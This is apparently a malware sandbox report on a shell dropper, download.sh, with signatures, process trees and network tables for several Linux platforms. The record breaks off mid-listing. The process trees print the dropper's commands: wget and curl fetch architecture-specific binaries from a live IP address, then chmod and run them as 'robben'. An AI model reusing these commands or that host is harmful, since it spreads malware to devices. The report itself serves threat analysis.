Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file download.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:53
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:32
Platform
debian12-mipsel-20240221-en
Max time kernel
85s
Max time network
90s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-82170dcea2b744dd92f83c5a7aa4eccb-systemd-logind.service-gUMMDR]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-14 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:52
Platform
debian9-armhf-20240611-en
Max time kernel
84s
Max time network
85s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-Qigx24]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
memory/837-1-0xb66e8000-0xb66f9044-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
69s
Max time network
479s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-timedated.service-ZPDt04]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x config-err-eBgUu0 download.sh netplan_lclepcne robben snap-private-tmp ssh-w2DkUwMvVabC systemd-private-c8662c6176344cfb8cfaf89749cac76c-bolt.service-6G729x systemd-private-c8662c6176344cfb8cfaf89749cac76c-colord.service-AEFPDD systemd-private-c8662c6176344cfb8cfaf89749cac76c-ModemManager.service-66xRkY systemd-private-c8662c6176344cfb8cfaf89749cac76c-systemd-resolved.service-YkivNc]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.65.91:443 | tcp | |
| GB | 195.181.164.19:443 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:56
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
83s
Max time network
478s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
